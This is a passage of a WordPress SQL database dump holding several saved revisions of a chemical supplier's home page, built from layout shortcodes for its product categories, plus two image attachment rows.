style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 17:59:53', '2016-08-18 17:59:53', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (478, 1, '2016-08-18 18:00:54', '2016-08-18 18:00:54', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&lt;BR&gt;\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:00:54', '2016-08-18 18:00:54', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (479, 1, '2016-08-18 18:02:00', '2016-08-18 18:02:00', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:02:00', '2016-08-18 18:02:00', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (480, 1, '2016-08-18 18:04:27', '2016-08-18 18:04:27', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:04:27', '2016-08-18 18:04:27', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (481, 1, '2016-08-18 18:05:42', '2016-08-18 18:05:42', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#002c56" text_color="light"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:05:42', '2016-08-18 18:05:42', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (482, 1, '2016-08-18 18:06:38', '2016-08-18 18:06:38', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#002c56" text_color="light"]\r\n\r\n&nbsp;\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:06:38', '2016-08-18 18:06:38', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (484, 1, '2016-08-18 18:07:26', '2016-08-18 18:07:26', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:07:26', '2016-08-18 18:07:26', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (485, 3, '2016-08-18 18:08:29', '2016-08-18 18:08:29', '', 'specialty products', '', 'inherit', 'open', 'closed', '', 'specialty-products', '', '', '2016-08-18 18:08:29', '2016-08-18 18:08:29', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/specialty-products.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (486, 3, '2016-08-18 18:08:58', '2016-08-18 18:08:58', '', 'Epoxy resins', '', 'inherit', 'open', 'closed', '', 'epoxy-resins', '', '', '2016-09-21 14:56:21', '2016-09-21 14:56:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Epoxy-resins.jpg', 0, 'attachment', 'image/jpeg', 0); 
